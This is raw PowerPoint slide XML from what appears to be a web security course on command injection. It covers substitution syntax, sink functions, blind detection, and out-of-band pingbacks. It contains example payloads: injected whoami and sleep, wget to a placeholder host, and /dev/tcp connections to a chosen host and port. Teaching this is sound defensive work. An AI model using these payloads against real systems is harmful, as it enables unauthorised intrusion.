                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>|| 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6284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A2C4-8866-4E4C-ACC8-8C0B539E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4973A9-A906-4E9C-9EDB-9DD97982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2B23A-74B1-4012-B4EC-348C3FDC5E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>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Command substitutions are another way to inject code: they work by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>substituting commands enclosed in special delimiters</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> with their output</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>The two main syntaxes are</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>$(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>foobar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>)        ls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$(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>whoami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) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>--&gt; ls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www-data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>`</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>foobar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>`           ls `</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>whoami</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>`  --&gt; ls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www-data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri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53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3906-AE4F-41AC-9E9A-F387543C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B5BA18-0646-4192-81F7-195C2028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B75E0-6958-4B43-8E6E-622F2B1687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To find a command injection code in a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>BlackBox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> environment, it is necessary to</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Look at the web application logic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>.  Might it use some external program to implement the services?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Input some special characters</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>. Does the application throw an error/fail?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4134145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B334-4EFB-4EBA-AB13-D0A47166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214C68-4922-43D2-93FC-0C47D0CE0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4BECD-5915-4491-8D21-421FD028D5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85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>In a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>WhiteBox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> environment, it is easier to find these flaws</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Command injection sinks are easily identifiable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Look at the language in which the application is written, and look for all the function/statements that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>could execute system commands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Some common functions are</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>sxec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>system()</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>popen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>eval()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>backtics</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1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(``)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11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7E9A-EF60-446D-9674-92F77822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Command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D2C4B0-A177-4B96-8515-DF6A0DA0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6FD01-5471-40E5-A498-ACD848560D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Once an entry point that might be vulnerable is found, it is possible to try to inject code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To do so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If the applications throws errors, inject a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>non-existent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> command, and look at the error</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>bash: command not found: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>non-existent-command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Try with a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>sleep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> and look at the response time</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>sleep 5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133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&amp; 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400" dirty="0"/>
              <a:t>This presentation is licensed under the </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Creative Commons </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0"/>
              <a:t>BY-NC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>License</a:t>
            </a:r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endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>To view a copy of the license, visit:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1200" dirty="0"/>
              <a:t>http://creativecommons.org/licenses/by-nc/3.0/legalcode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We disclaim any warranties or representations as to the accuracy or completeness of this material.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Materials are provided “as is” without warranty of any kind, either express or implied, including without limitation, warranties of merchantability, fitness for a particular purpose, and non-infringement. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Under no circumstances shall we be liable for any loss, damage, liability or expense incurred or suffered which is claimed to have resulted from use of this material.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License Information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pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Immagine 6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2647950"/>
            <a:ext cx="3286126" cy="1143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43970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C9C0D-7E4B-4BAE-8EDA-5F117FC2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3A8A07-6EE8-41A6-BB16-CBEBCDA2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FF633-2705-44DB-9416-E853FE7DD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Another way is to use a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>pingback</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Pingbacks are back-connections on a host which is controlled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They provide a very powerful way to verify if there are command injection flaws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04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D08C-3B22-4B7F-AE9B-A7658704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288FDC-04F8-423A-A587-65433094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C09DF-68DD-4B76-9C41-A8789B5C04F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To use a pingback, you need a reachable public host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It is possible to use either a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>vps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> or a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>http/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> tunneling tool</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>, like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>ngrok</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>*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To issue a request, use</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> commonly installed programs like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" err="1">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>wget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b="1" i="1" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>curl </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" err="1">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>telnet</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="365760" lvl="1" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>wget</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> http://host/ping</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consola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3D401-5C64-4726-A9FB-489D5068B8F4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5663397" y="4279900"/>
            <a:ext cx="3097923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Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>*refer to the slides </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" i="1" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>"WS_1.1-HTTP Protocol and Web Security Overview"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> on how to set up a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>ngrok</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> tunnel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Calibri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16975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C6FA2-E5F0-4B8B-AEBD-78317ECB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E7351-C666-470F-9F6A-DDCC1370A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C4C01-2960-4A56-8897-90A400B85ED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925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For </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>injecting into bash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>, it is possible to try to open a TCP connection using the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>special files</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>/dev/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>/*</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Put some data on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>/dev/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>/*host*/*port*,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> bash will open a connection on *host*:*port* and will send to it that data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>For example</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>echo Hello World &gt; /dev/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>/localhost/1337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Will send "Hello World" to the port 1337 on localhost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750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AA04-2431-4731-B58A-19CEB6B4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024205-395B-4294-8054-BE9BF001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977B8-3FF4-41A8-B918-0B3F82EAB7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Another powerful way to validate a command injection is to issue a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>DNS pingback</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>DNS queries are powerful because</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> they are hardly blacklisted on firewall</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>To create a DNS bin, it is possible to use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>http://requestbin.net/dns </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>http://dnsbin.zhack.ca/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38162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4330-A9C8-4D49-9350-6090A268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C5BBC-A03E-4577-903C-1701C312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F838A-97AF-4C19-93C8-0F77CB76FE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err="1">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Requestbin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> will provide a DNS name like *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>.d955264982a2216dc0c4.d.requestbin.net</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>If we replace the * symbol with a string, and then issue a DNS resolution, we will see a pingback in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>requestbin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> page with the string just provided</a:t>
            </a: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7832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15F5-EB60-4490-A024-801E97DF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CDFBE6-4A8D-4A0C-B84C-A31FC651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DA7FA4-DF47-42F4-8525-D765F4214D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To trigger a DNS resolution on an injected command, there are several options</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>wget</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>, curl, dig, ping </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>are commands normally installed in Linux distributions and they can issue a DNS resolution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It is possible to use the command in bash injections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echo 1 &gt; /dev/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>/*hostname*/*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>someport</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri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792080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6990-7D31-41CE-8ED0-05BE3479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Outline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70550-720E-4296-A137-81FBC8D6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326CC-0F93-4FD8-83AE-10C4FBE77C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85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Introduction</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Command Injections</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>General Overview</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Output Retrieving</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Code Injections</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>General Overview</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>PHP Code Injections</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Tips and Tricks</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Fixes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627568-05BA-41D4-92B1-5BE86AFACDE1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="612322" y="2710543"/>
            <a:ext cx="4653642" cy="173899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914B61-96C8-4248-BDE0-53560955BFBA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
